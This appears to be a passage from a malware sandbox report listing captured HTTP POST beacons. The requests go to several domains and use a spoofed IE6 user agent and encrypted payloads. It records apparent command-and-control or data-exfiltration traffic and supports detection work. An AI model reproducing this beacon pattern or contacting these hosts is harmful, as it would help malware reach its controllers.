                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 43 31 36 73 4a 47 71 5a 7a 5a 6b 71 4f 44 6d 54 54 66 6c 5a 38 69 32 4b 58 4d 69 61 44 61 2b 54 50 6e 72 31 69 73 48 33 39 42 66 2f 39 4e 77 76 66 63 75 54 4b 35 4f 33 36 6f 65 79 2f 6e 4e 56 56 46 6a 68 38 6b 31 71 53 6f 2f 67 52 75 55 49 78 4f 48 75 7a 30 48 31 37 37 78 57 63 70 4d 47 51 44 37 54 53 70 72 52 77 76 77 34 51 68 2b 73 47 34 42 37 67 6f 55 49 4b 6b 4e 4b 6f 35 4b 31 34 62 76 65 56 31 31 45 52 38 6e 69 63 72 73 2b 6c 33 77 71 4d 7a 74 59 4f 58 69 33 78 75 7a 73 32 4c 35 38 6c 6e 39 4b 51 44 6f 33 2b 54 74 4d 54 70 48 6e 2f 71 6f 48 59 54 6c 79 57 38 47 79 31 6c 4a 6f 43 49 50 58 48 39 59 4d 47 6a 38 54 43 2f 36 34 57 67 4e 42 5a 74 77 49 43 6d 74 37 59 48 68 42 49 49 61 66 63 6f 50 69 6e 43 54 39 77 67 42 67 50 36 65 63 72 53 62 61 54 6e 64 47 34 2b 46 74 4c 73 32 58 74 74 52 7a 6e 39 74 6c 68 35 66 69 50 74 53 59 2f 64 38 72 38 6c 30 56 72 44 47 4d 56 66 45 42 42 4b 69 69 77 55 5a 53 30 7a 42 4e 43 72 69 72 37 33 59 66 56 43 6b 62 68 56 6a 44 71 5a 73 41 53 58 51 49 35 4f 32 61 68 62 31 64 6b 79 2f 6a 53 35 58 37 4f 32 44 34 78 47 4a 6b 2f 74 63 73 4d 68 47 71 50 59 38 64 2f 5a 6a 36 6b 63 37 36 4c 77 7a 4a 76 61 2b 63 77 50 59 5a 77 76 73 6d 63 64 75 65 30 50 4b 76 6c 51 4a 4f 46 62 6c 38 42 38 36 64 6f 34 4b 78 79 2f 31 48 32 32 4b 6a 36 45 64 75 4f 5a 43 6f 42 35 6b 56 67 37 6d 30 56 45 46 68 70 58 39 77 49 34 56 35 36 6d 4d 64 42 61 38 33 66 67 62 70 75 65 61 53 45 50 46 34 53 75 32 4a 6f 59 61 51 6b 45 4d 4e 44 53 2f 4c 56 77 37 47 6b 6d 6e 56 4c 74 42 35 4b 41 70 4e 5a 48 49 56 6a 69 36 2b 43 6a 41 77 6c 70 63 42 6c 4d 34 51 77 5a 6d 6c 64 37 4f 49 72 31 58 67 36 39 4d 72 54 4c 57 31 72 77 58 75 75 34 55 4e 39 4c 34 3d Data Ascii: C16sJGqZzZkqODmTTflZ8i2KXMiaDa+TPnr1isH39Bf/9NwvfcuTK5O36oey/nNVVFjh8k1qSo/gRuUIxOHuz0H177xWcpMGQD7TSprRwvw4Qh+sG4B7goUIKkNKo5K14bveV11ER8nicrs+l3wqMztYOXi3xuzs2L58ln9KQDo3+TtMTpHn/qoHYTlyW8Gy1lJoCIPXH9YMGj8TC/64WgNBZtwICmt7YHhBIIafcoPinCT9wgBgP6ecrSbaTndG4+FtLs2XttRzn9tlh5fiPtSY/d8r8l0VrDGMVfEBBKiiwUZS0zBNCrir73YfVCkbhVjDqZsASXQI5O2ahb1dky/jS5X7O2D4xGJk/tcsMhGqPY8d/Zj6kc76LwzJva+cwPYZwvsmcdue0PKvlQJOFbl8B86do4Kxy/1H22Kj6EduOZCoB5kVg7m0VEFhpX9wI4V56mMdBa83fgbpueaSEPF4Su2JoYaQkEMNDS/LVw7GkmnVLtB5KApNZHIVji6+CjAwlpcBlM4QwZmld7OIr1Xg69MrTLW1rwXuu4UN9L4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 62 6d 30 4a 4d 61 71 67 33 70 6e 6b 37 54 6c 37 6a 64 68 61 63 57 31 54 4e 55 6a 61 64 53 45 5a 66 68 31 6c 6e 37 71 47 39 4c 32 30 50 6d 6f 6d 52 77 65 49 33 2b 67 2b 57 71 47 48 70 6e 4b 33 6f 32 54 31 2b 79 36 56 6c 38 6c 34 66 4c 65 43 69 74 65 77 75 6b 71 79 6c 6c 35 67 67 4f 37 56 38 76 52 4b 71 67 45 56 6f 32 54 6f 66 4a 61 48 47 53 6c 41 49 6c 6a 4d 58 4a 59 31 43 36 32 76 58 63 41 78 79 36 67 38 41 77 4a 4c 50 46 75 63 31 65 44 48 62 4e 4f 37 30 55 67 62 33 77 54 53 49 46 76 57 30 6e 43 4b 59 70 58 56 35 50 44 4d 71 45 77 36 62 79 53 76 51 30 6e 78 76 4d 71 71 32 56 74 44 46 49 30 36 6f 65 71 6b 66 58 43 30 30 4f 57 5a 30 33 52 66 76 33 67 45 71 30 5a 55 4f 71 70 62 64 44 6f 4a 53 6e 38 39 35 57 46 33 45 31 2b 35 6e 48 35 6e 4c 39 34 58 34 38 4d 55 65 75 33 73 6b 5a 44 75 63 51 59 77 67 43 30 41 41 30 58 35 69 4c 38 68 66 45 4e 67 72 43 35 6d 65 77 2b 4e 78 55 6a 37 68 38 41 6e 47 37 67 63 6c 50 61 30 78 37 6d 64 73 75 37 6e 48 53 39 76 74 68 66 46 53 41 6d 44 6b 50 46 76 4a 6c 6c 30 2b 57 5a 7a 41 35 33 38 76 31 39 52 73 67 47 34 41 35 4d 6e 32 77 54 4b 48 4a 68 68 68 54 35 2f 4c 68 77 61 51 61 42 67 34 38 48 7a 78 38 6a 39 37 49 64 58 61 65 53 33 64 38 55 65 62 51 46 54 77 4d 78 35 65 68 68 39 36 48 77 43 45 55 7a 61 65 46 6e 4c 41 46 49 4b 66 47 33 74 75 59 58 41 48 4a 6e 56 57 2b 2f 62 59 36 6c 68 53 51 6f 78 38 79 37 35 49 66 45 76 68 43 2b 6a 32 6a 4f 53 34 53 64 55 59 6f 46 62 33 52 38 30 70 6b 6b 75 42 38 2b 70 76 6c 36 53 6d 4d 58 66 32 68 55 65 33 32 65 45 64 59 45 37 71 75 79 6b 69 4c 4d 62 51 5a 65 6a 6d 75 4c 4b 4a 77 65 52 74 37 39 34 4f 71 66 4b 56 75 58 4b 69 6e 35 6c 49 66 6a 61 42 53 71 4d 68 51 52 52 30 72 55 43 58 72 6f 3d Data Ascii: bm0JMaqg3pnk7Tl7jdhacW1TNUjadSEZfh1ln7qG9L20PmomRweI3+g+WqGHpnK3o2T1+y6Vl8l4fLeCitewukqyll5ggO7V8vRKqgEVo2TofJaHGSlAIljMXJY1C62vXcAxy6g8AwJLPFuc1eDHbNO70Ugb3wTSIFvW0nCKYpXV5PDMqEw6bySvQ0nxvMqq2VtDFI06oeqkfXC00OWZ03Rfv3gEq0ZUOqpbdDoJSn895WF3E1+5nH5nL94X48MUeu3skZDucQYwgC0AA0X5iL8hfENgrC5mew+NxUj7h8AnG7gclPa0x7mdsu7nHS9vthfFSAmDkPFvJll0+WZzA538v19RsgG4A5Mn2wTKHJhhhT5/LhwaQaBg48Hzx8j97IdXaeS3d8UebQFTwMx5ehh96HwCEUzaeFnLAFIKfG3tuYXAHJnVW+/bY6lhSQox8y75IfEvhC+j2jOS4SdUYoFb3R80pkkuB8+pvl6SmMXf2hUe32eEdYE7quykiLMbQZejmuLKJweRt794OqfKVuXKin5lIfjaBSqMhQRR0rUCXro=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 62 6d 30 4a 4d 61 71 67 33 70 6e 6b 37 54 6c 37 6a 64 68 61 63 57 31 54 4e 55 6a 61 64 53 45 5a 66 68 31 6c 6e 37 71 47 39 4c 32 30 50 6d 6f 6d 52 77 65 49 33 2b 67 2b 57 71 47 48 70 6e 4b 33 6f 32 54 31 2b 79 36 56 6c 38 6c 34 66 4c 65 43 69 74 65 77 75 6b 71 79 6c 6c 35 67 67 4f 37 56 38 76 52 4b 71 67 45 56 6f 32 54 6f 66 4a 61 48 47 53 6c 41 49 6c 6a 4d 58 4a 59 31 43 36 32 76 58 63 41 78 79 36 67 38 41 77 4a 4c 50 46 75 63 31 65 44 48 62 4e 4f 37 30 55 67 62 33 77 54 53 49 46 76 57 30 6e 43 4b 59 70 58 56 35 50 44 4d 71 45 77 36 62 79 53 76 51 30 6e 78 76 4d 71 71 32 56 74 44 46 49 30 36 6f 65 71 6b 66 58 43 30 30 4f 57 5a 30 33 52 66 76 33 67 45 71 30 5a 55 4f 71 70 62 64 44 6f 4a 53 6e 38 39 35 57 46 33 45 31 2b 35 6e 48 35 6e 4c 39 34 58 34 38 4d 55 65 75 33 73 6b 5a 44 75 63 51 59 77 67 43 30 41 41 30 58 35 69 4c 38 68 66 45 4e 67 72 43 35 6d 65 77 2b 4e 78 55 6a 37 68 38 41 6e 47 37 67 63 6c 50 61 30 78 37 6d 64 73 75 37 6e 48 53 39 76 74 68 66 46 53 41 6d 44 6b 50 46 76 4a 6c 6c 30 2b 57 5a 7a 41 35 33 38 76 31 39 52 73 67 47 34 41 35 4d 6e 32 77 54 4b 48 4a 68 68 68 54 35 2f 4c 68 77 61 51 61 42 67 34 38 48 7a 78 38 6a 39 37 49 64 58 61 65 53 33 64 38 55 65 62 51 46 54 77 4d 78 35 65 68 68 39 36 48 77 43 45 55 7a 61 65 46 6e 4c 41 46 49 4b 66 47 33 74 75 59 58 41 48 4a 6e 56 57 2b 2f 62 59 36 6c 68 53 51 6f 78 38 79 37 35 49 66 45 76 68 43 2b 6a 32 6a 4f 53 34 53 64 55 59 6f 46 62 33 52 38 30 70 6b 6b 75 42 38 2b 70 76 6c 36 53 6d 4d 58 66 32 68 55 65 33 32 65 45 64 59 45 37 71 75 79 6b 69 4c 4d 62 51 5a 65 6a 6d 75 4c 4b 4a 77 65 52 74 37 39 34 4f 71 66 4b 56 75 58 4b 69 6e 35 6c 49 66 6a 61 42 53 71 4d 68 51 52 52 30 72 55 43 58 72 6f 3d Data Ascii: bm0JMaqg3pnk7Tl7jdhacW1TNUjadSEZfh1ln7qG9L20PmomRweI3+g+WqGHpnK3o2T1+y6Vl8l4fLeCitewukqyll5ggO7V8vRKqgEVo2TofJaHGSlAIljMXJY1C62vXcAxy6g8AwJLPFuc1eDHbNO70Ugb3wTSIFvW0nCKYpXV5PDMqEw6bySvQ0nxvMqq2VtDFI06oeqkfXC00OWZ03Rfv3gEq0ZUOqpbdDoJSn895WF3E1+5nH5nL94X48MUeu3skZDucQYwgC0AA0X5iL8hfENgrC5mew+NxUj7h8AnG7gclPa0x7mdsu7nHS9vthfFSAmDkPFvJll0+WZzA538v19RsgG4A5Mn2wTKHJhhhT5/LhwaQaBg48Hzx8j97IdXaeS3d8UebQFTwMx5ehh96HwCEUzaeFnLAFIKfG3tuYXAHJnVW+/bY6lhSQox8y75IfEvhC+j2jOS4SdUYoFb3R80pkkuB8+pvl6SmMXf2hUe32eEdYE7quykiLMbQZejmuLKJweRt794OqfKVuXKin5lIfjaBSqMhQRR0rUCXro=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 75 42 70 65 6e 55 6b 6c 34 70 6e 4d 78 62 44 31 6d 4f 37 6d 79 32 49 41 2b 64 6c 6e 37 4c 4c 41 6a 66 51 32 46 47 42 54 51 7a 6d 2b 76 6b 61 70 67 71 66 7a 62 32 52 43 65 43 68 51 57 44 46 36 68 65 2f 53 41 45 50 4a 34 51 34 55 37 75 51 64 49 71 6c 55 75 62 79 46 54 74 69 54 79 30 46 65 4f 6c 4e 35 51 6c 2f 37 6d 51 39 55 59 4f 41 6a 6e 2f 6c 4e 54 79 57 41 58 75 39 62 48 75 70 41 43 64 59 4a 6b 79 2f 63 37 77 51 65 56 4f 45 35 34 46 5a 37 56 6c 6d 6a 53 56 6c 4c 46 65 6b 43 75 4a 51 2f 4c 48 4b 48 31 79 36 45 47 48 47 4c 71 41 72 37 42 4c 6f 31 64 5a 73 2b 2b 37 36 2f 5a 78 69 36 62 4a 2b 62 63 70 62 47 6a 49 67 67 69 6a 35 2f 77 52 57 52 56 49 71 4a 45 59 79 33 50 49 59 43 2b 70 76 56 2b 73 43 6b 42 6b 38 41 5a 63 7a 55 61 70 48 35 34 39 65 53 73 39 52 71 75 58 6b 54 50 62 6a 68 55 63 6c 4b 56 42 51 4a 51 49 49 57 65 66 44 51 7a 6d 64 53 68 5a 56 64 57 39 30 55 43 2f 79 70 31 5a 64 76 57 61 35 38 70 56 72 57 4b 66 4a 69 49 61 44 42 49 71 5a 71 4c 74 70 39 55 67 38 56 66 66 4f 57 36 34 4e 69 69 39 4f 49 4a 58 79 65 67 77 72 35 69 70 59 57 72 79 6c 64 4c 73 30 57 57 64 56 41 4f 57 75 7a 31 67 70 62 6f 67 48 57 62 69 4f 65 34 31 44 69 37 34 2f 34 65 44 44 41 72 72 57 35 37 38 56 6a 38 74 47 32 41 50 7a 75 62 2b 71 78 38 56 30 53 43 69 47 73 75 46 4c 5a 75 55 58 62 30 36 33 69 4a 6a 55 77 48 77 38 41 68 4b 38 76 43 59 4c 64 67 43 46 75 6f 4d 35 53 55 4b 64 4c 52 65 74 78 53 47 6a 6d 42 4a 49 69 2f 6a 77 5a 78 79 78 54 4a 54 4a 38 6d 66 61 55 6c 57 42 70 69 31 4e 63 34 37 4a 77 59 68 75 44 43 38 37 4a 6c 74 4b 7a 5a 31 4d 6f 50 57 6d 6a 70 73 57 6d 32 6c 6d 54 41 54 73 44 4b 48 46 6c 41 49 67 51 67 47 75 6a 37 76 74 31 71 7a 36 4a Data Ascii: uBpenUkl4pnMxbD1mO7my2IA+dln7LLAjfQ2FGBTQzm+vkapgqfzb2RCeChQWDF6he/SAEPJ4Q4U7uQdIqlUubyFTtiTy0FeOlN5Ql/7mQ9UYOAjn/lNTyWAXu9bHupACdYJky/c7wQeVOE54FZ7VlmjSVlLFekCuJQ/LHKH1y6EGHGLqAr7BLo1dZs++76/Zxi6bJ+bcpbGjIggij5/wRWRVIqJEYy3PIYC+pvV+sCkBk8AZczUapH549eSs9RquXkTPbjhUclKVBQJQIIWefDQzmdShZVdW90UC/yp1ZdvWa58pVrWKfJiIaDBIqZqLtp9Ug8VffOW64Nii9OIJXyegwr5ipYWryldLs0WWdVAOWuz1gpbogHWbiOe41Di74/4eDDArrW578Vj8tG2APzub+qx8V0SCiGsuFLZuUXb063iJjUwHw8AhK8vCYLdgCFuoM5SUKdLRetxSGjmBJIi/jwZxyxTJTJ8mfaUlWBpi1Nc47JwYhuDC87JltKzZ1MoPWmjpsWm2lmTATsDKHFlAIgQgGuj7vt1qz6J
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 67 4c 37 38 4c 71 4f 50 33 70 6b 36 57 43 41 58 4b 6a 44 69 77 4d 79 4e 67 2b 66 4a 68 6d 31 30 68 32 65 76 52 46 59 55 6d 6e 45 38 4a 4f 5a 66 6c 55 44 6e 41 5a 4d 5a 6f 59 39 6d 79 69 67 53 7a 55 76 79 61 57 6b 44 31 32 62 44 38 69 6b 4b 52 32 49 52 58 63 39 68 73 6f 52 68 64 5a 36 32 68 72 4b 69 73 52 33 69 52 38 2f 67 77 50 6c 6e 51 61 4a 34 33 58 47 32 30 73 65 75 6a 4a 49 5a 70 57 56 64 38 6a 4c 73 6a 61 67 4b 35 57 5a 34 69 51 4e 48 2b 79 77 69 55 30 72 33 57 52 42 69 30 73 48 33 36 44 4b 37 76 55 69 49 65 45 62 4b 44 44 42 39 68 35 44 46 49 56 41 55 6b 59 53 77 35 2b 4b 55 7a 43 4b 49 67 6f 65 4d 6a 47 69 57 2f 70 57 78 4c 63 72 54 71 55 57 51 36 52 30 70 61 72 51 44 44 4d 77 35 5a 45 4a 35 62 46 42 76 6b 45 54 53 53 61 42 47 53 58 58 38 38 67 6e 4a 58 6c 4e 61 53 4f 6c 76 6c 30 32 4e 33 67 74 6c 49 38 59 44 6c 44 4b 36 76 56 65 35 68 66 4c 2f 6e 78 4b 4d 4f 5a 76 44 65 39 2f 58 67 71 4c 55 37 38 6a 38 57 62 2b 63 61 5a 36 71 46 55 79 73 49 58 52 59 6b 58 55 54 70 6b 46 65 70 47 64 76 4e 73 67 48 52 65 6e 4b 69 44 38 6e 52 67 45 45 30 61 53 69 38 33 57 79 38 68 65 79 4d 45 69 61 72 76 67 31 58 57 46 59 63 63 66 35 35 50 64 37 73 6f 41 61 4b 75 48 71 67 71 42 2b 57 64 65 64 6a 66 36 5a 50 78 77 66 53 6a 6b 54 54 67 78 34 6d 74 63 6c 36 32 72 37 36 4b 46 73 57 4e 42 76 70 58 2b 42 58 68 56 46 4a 7a 4f 67 50 43 76 79 31 73 54 49 63 74 67 6b 36 39 42 4f 4c 6e 30 77 6e 34 6f 61 42 62 51 6f 73 31 6c 68 61 63 33 55 54 59 6f 51 63 69 43 69 78 44 59 32 48 49 75 65 66 42 4f 6e 48 70 51 34 65 34 53 43 48 78 31 6a 31 59 6b 36 59 31 65 34 4f 77 54 63 53 4f 6c 35 71 2f 42 57 4b 48 49 50 65 46 50 35 44 4a 39 32 49 57 45 4e 5a 31 49 34 Data Ascii: gL78LqOP3pk6WCAXKjDiwMyNg+fJhm10h2evRFYUmnE8JOZflUDnAZMZoY9myigSzUvyaWkD12bD8ikKR2IRXc9hsoRhdZ62hrKisR3iR8/gwPlnQaJ43XG20seujJIZpWVd8jLsjagK5WZ4iQNH+ywiU0r3WRBi0sH36DK7vUiIeEbKDDB9h5DFIVAUkYSw5+KUzCKIgoeMjGiW/pWxLcrTqUWQ6R0parQDDMw5ZEJ5bFBvkETSSaBGSXX88gnJXlNaSOlvl02N3gtlI8YDlDK6vVe5hfL/nxKMOZvDe9/XgqLU78j8Wb+caZ6qFUysIXRYkXUTpkFepGdvNsgHRenKiD8nRgEE0aSi83Wy8heyMEiarvg1XWFYccf55Pd7soAaKuHqgqB+Wdedjf6ZPxwfSjkTTgx4mtcl62r76KFsWNBvpX+BXhVFJzOgPCvy1sTIctgk69BOLn0wn4oaBbQos1lhac3UTYoQciCixDY2HIuefBOnHpQ4e4SCHx1j1Yk6Y1e4OwTcSOl5q/BWKHIPeFP5DJ92IWENZ1I4
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: snkz=84.17.52.43; btst=23d2d650a50ea91f96d166b8feecfbbf|84.17.52.43|1690487584|1690487542|12|3|0Data Raw: 4d 79 75 4f 4c 31 75 55 33 70 6d 72 2f 73 41 6e 63 72 32 37 4f 45 54 50 65 48 6e 68 74 52 65 56 76 39 50 73 2b 32 66 39 79 62 75 59 75 75 6a 4f 33 66 76 76 65 48 39 71 69 72 67 5a 37 64 2b 34 4d 47 34 54 53 38 42 66 65 75 4e 54 61 76 4b 6b 68 4e 63 55 6c 42 63 71 72 30 2b 67 68 65 63 7a 2f 43 62 49 6e 45 65 36 32 57 39 6d 4b 31 34 4f 68 4a 39 44 53 2b 4a 50 4d 4e 5a 63 52 48 49 6e 4a 76 59 4e 6c 77 30 57 59 2b 6b 52 34 74 6e 55 57 65 39 56 5a 6e 6b 51 42 61 33 39 4a 33 4b 43 62 37 74 4f 49 35 4d 37 4b 50 30 38 2b 38 72 57 79 70 4f 39 74 6b 6e 6d 42 2b 38 67 35 62 46 74 72 4a 4b 79 68 4b 47 6e 36 79 2f 58 75 51 55 55 35 2f 58 6a 4f 56 71 4e 44 6a 51 31 6b 55 4a 75 61 55 56 2b 75 6b 6b 4f 31 39 67 4e 5a 35 6a 44 61 73 65 7a 31 7a 78 64 73 6d 71 73 2f 5a 39 51 4c 36 4a 69 58 4d 52 38 58 43 62 75 31 4b 59 64 43 47 58 53 48 34 47 6e 6a 51 35 30 42 42 6d 70 56 78 6e 45 38 45 35 67 5a 58 45 5a 30 51 36 32 6a 46 75 79 6a 6e 79 51 4d 48 68 79 45 65 42 55 35 35 7a 51 49 5a 5a 4f 4f 4a 67 64 52 43 77 48 78 76 74 2f 51 69 4f 7a 34 51 38 57 6d 4e 37 48 65 73 4d 6a 32 66 75 61 5a 51 67 53 6b 31 58 79 6f 4e 46 71 67 34 38 4e 4f 73 73 59 35 57 52 2f 64 64 66 69 47 4b 66 54 46 68 53 42 44 52 6f 78 4d 6b 34 58 36 37 4a 51 58 78 6a 78 74 49 46 35 63 4a 76 6c 4d 76 62 34 6e 2b 47 49 73 64 48 71 6f 55 36 6d 70 59 79 30 6f 73 4b 6f 46 2f 58 58 31 42 37 69 2f 4f 63 4b 73 74 49 56 31 53 45 34 2f 72 59 33 2f 2b 39 52 59 32 53 72 57 55 57 33 37 75 65 4a 75 64 72 4d 31 38 36 48 39 63 75 74 44 6f 54 4e 76 65 70 69 6f 58 63 41 64 72 6b 38 30 51 5a 33 55 34 79 53 2f 76 6f 7a 2b 66 44 71 39 57 49 51 64 5a 34 35 76 76 6a 78 62 69 68 4b 2f 76 54 6f 53 54 31 61 44 51 39 78 62 48 51 36 61 30 38 6c 4f 48 4f 32 56 71 47 2b 42 33 2b 4b 76 48 48 6d 51 2f 5a 2f 53 5a 6b 51 61 2b 77 3d Data Ascii: MyuOL1uU3pmr/sAncr27OETPeHnhtReVv9Ps+2f9ybuYuujO3fvveH9qirgZ7d+4MG4TS8BfeuNTavKkhNcUlBcqr0+ghecz/CbInEe62W9mK14OhJ9DS+JPMNZcRHInJvYNlw0WY+kR4tnUWe9VZnkQBa39J3KCb7tOI5M7KP08+8rWypO9tknmB+8g5bFtrJKyhKGn6y/XuQUU5/XjOVqNDjQ1kUJuaUV+ukkO19gNZ5jDasez1zxdsmqs/Z9QL6JiXMR8XCbu1KYdCGXSH4GnjQ50BBmpVxnE8E5gZXEZ0Q62jFuyjnyQMHhyEeBU55zQIZZOOJgdRCwHxvt/QiOz4Q8WmN7HesMj2fuaZQgSk1XyoNFqg48NOssY5WR/ddfiGKfTFhSBDRoxMk4X67JQXxjxtIF5cJvlMvb4n+GIsdHqoU6mpYy0osKoF/XX1B7i/OcKstIV1SE4/rY3/+9RY2SrWUW37ueJudrM186H9cutDoTNvepioXcAdrk80QZ3U4yS/voz+fDq9WIQdZ45vvjxbihK/vToST1aDQ9xbHQ6a08lOHO2VqG+B3+KvHHmQ/Z/SZkQa+w=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 67 4c 37 38 4c 71 4f 50 33 70 6b 36 57 43 41 58 4b 6a 44 69 77 4d 79 4e 67 2b 66 4a 68 6d 31 30 68 32 65 76 52 46 59 55 6d 6e 45 38 4a 4f 5a 66 6c 55 44 6e 41 5a 4d 5a 6f 59 39 6d 79 69 67 53 7a 55 76 79 61 57 6b 44 31 32 62 44 38 69 6b 4b 52 32 49 52 58 63 39 68 73 6f 52 68 64 5a 36 32 68 72 4b 69 73 52 33 69 52 38 2f 67 77 50 6c 6e 51 61 4a 34 33 58 47 32 30 73 65 75 6a 4a 49 5a 70 57 56 64 38 6a 4c 73 6a 61 67 4b 35 57 5a 34 69 51 4e 48 2b 79 77 69 55 30 72 33 57 52 42 69 30 73 48 33 36 44 4b 37 76 55 69 49 65 45 62 4b 44 44 42 39 68 35 44 46 49 56 41 55 6b 59 53 77 35 2b 4b 55 7a 43 4b 49 67 6f 65 4d 6a 47 69 57 2f 70 57 78 4c 63 72 54 71 55 57 51 36 52 30 70 61 72 51 44 44 4d 77 35 5a 45 4a 35 62 46 42 76 6b 45 54 53 53 61 42 47 53 58 58 38 38 67 6e 4a 58 6c 4e 61 53 4f 6c 76 6c 30 32 4e 33 67 74 6c 49 38 59 44 6c 44 4b 36 76 56 65 35 68 66 4c 2f 6e 78 4b 4d 4f 5a 76 44 65 39 2f 58 67 71 4c 55 37 38 6a 38 57 62 2b 63 61 5a 36 71 46 55 79 73 49 58 52 59 6b 58 55 54 70 6b 46 65 70 47 64 76 4e 73 67 48 52 65 6e 4b 69 44 38 6e 52 67 45 45 30 61 53 69 38 33 57 79 38 68 65 79 4d 45 69 61 72 76 67 31 58 57 46 59 63 63 66 35 35 50 64 37 73 6f 41 61 4b 75 48 71 67 71 42 2b 57 64 65 64 6a 66 36 5a 50 78 77 66 53 6a 6b 54 54 67 78 34 6d 74 63 6c 36 32 72 37 36 4b 46 73 57 4e 42 76 70 58 2b 42 58 68 56 46 4a 7a 4f 67 50 43 76 79 31 73 54 49 63 74 67 6b 36 39 42 4f 4c 6e 30 77 6e 34 6f 61 42 62 51 6f 73 31 6c 68 61 63 33 55 54 59 6f 51 63 69 43 69 78 44 59 32 48 49 75 65 66 42 4f 6e 48 70 51 34 65 34 53 43 48 78 31 6a 31 59 6b 36 59 31 65 34 4f 77 54 63 53 4f 6c 35 71 2f 42 57 4b 48 49 50 65 46 50 35 44 4a 39 32 49 57 45 4e 5a 31 49 34 Data Ascii: gL78LqOP3pk6WCAXKjDiwMyNg+fJhm10h2evRFYUmnE8JOZflUDnAZMZoY9myigSzUvyaWkD12bD8ikKR2IRXc9hsoRhdZ62hrKisR3iR8/gwPlnQaJ43XG20seujJIZpWVd8jLsjagK5WZ4iQNH+ywiU0r3WRBi0sH36DK7vUiIeEbKDDB9h5DFIVAUkYSw5+KUzCKIgoeMjGiW/pWxLcrTqUWQ6R0parQDDMw5ZEJ5bFBvkETSSaBGSXX88gnJXlNaSOlvl02N3gtlI8YDlDK6vVe5hfL/nxKMOZvDe9/XgqLU78j8Wb+caZ6qFUysIXRYkXUTpkFepGdvNsgHRenKiD8nRgEE0aSi83Wy8heyMEiarvg1XWFYccf55Pd7soAaKuHqgqB+Wdedjf6ZPxwfSjkTTgx4mtcl62r76KFsWNBvpX+BXhVFJzOgPCvy1sTIctgk69BOLn0wn4oaBbQos1lhac3UTYoQciCixDY2HIuefBOnHpQ4e4SCHx1j1Yk6Y1e4OwTcSOl5q/BWKHIPeFP5DJ92IWENZ1I4
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 34 42 35 63 67 76 36 55 36 5a 6e 4e 46 32 37 30 79 62 68 32 71 2b 48 4f 6e 6a 32 2b 38 67 43 6c 45 6b 33 46 39 38 4c 49 5a 77 47 64 77 33 74 6c 4d 44 56 55 48 45 2f 7a 6d 32 4e 2b 2b 74 7a 73 56 73 75 76 54 4b 35 45 73 50 66 46 33 4f 52 41 71 64 6a 7a 4f 74 34 63 67 43 4d 34 38 43 32 66 65 7a 71 6a 39 4f 66 34 66 67 61 7a 62 78 51 56 6f 43 42 55 4d 79 70 56 65 48 4b 56 53 6e 77 38 54 4a 54 33 4e 36 72 69 38 46 4e 6e 73 39 76 56 6e 4b 69 57 5a 44 6a 63 33 76 65 2b 6a 70 67 47 66 54 78 7a 35 4e 4d 57 57 67 77 5a 30 5a 6f 67 48 63 64 4a 2b 64 63 4c 61 55 6b 58 76 39 65 4b 43 49 51 51 2b 75 42 74 50 75 50 55 6b 58 2b 6c 4b 6f 6b 63 44 56 68 70 37 35 57 36 31 4e 69 50 4e 59 46 53 58 6d 33 39 31 53 47 53 78 6a 69 52 36 76 57 62 2f 70 38 58 4c 4b 7a 34 39 70 6e 56 38 73 5a 63 72 4e 6c 58 73 4e 54 68 31 30 33 53 75 6b 31 54 6c 59 46 46 66 43 59 57 31 47 34 37 34 44 67 5a 52 72 63 52 6b 35 68 77 31 4b 68 54 4a 57 4a 4c 47 72 45 4b 59 69 4d 74 4c 79 72 50 69 4d 64 53 4e 74 59 72 6b 73 5a 65 51 78 47 31 48 41 61 77 71 70 47 58 69 7a 2f 46 5a 6f 33 6b 72 55 48 2b 69 6e 4a 6c 56 64 56 53 33 2b 32 61 45 5a 6a 69 54 61 64 6b 59 76 4f 47 4b 57 48 77 79 4c 2b 2f 6a 71 48 61 75 50 39 52 69 7a 73 48 79 4a 6d 71 45 6a 32 6e 72 4d 71 4d 65 54 71 52 52 6f 48 5a 6a 5a 73 76 6f 6b 75 72 4e 66 6f 68 4a 54 5a 68 50 63 49 56 30 6d 49 51 42 6f 55 6d 48 33 63 51 35 79 69 53 62 77 48 4e 68 71 65 4a 68 69 4b 54 43 33 65 63 53 6f 39 73 58 46 37 66 36 62 63 49 33 54 70 34 65 72 77 34 31 6e 63 75 69 73 4c 54 63 51 4d 54 33 6b 76 34 74 76 33 42 4e 62 38 37 75 6b 2b 42 4e 4f 78 69 7a 4e 55 4f 6c 5a 58 76 4b 5a 70 77 4a 31 35 45 69 55 65 45 4f 71 56 58 73 63 4e 44 63 37 32 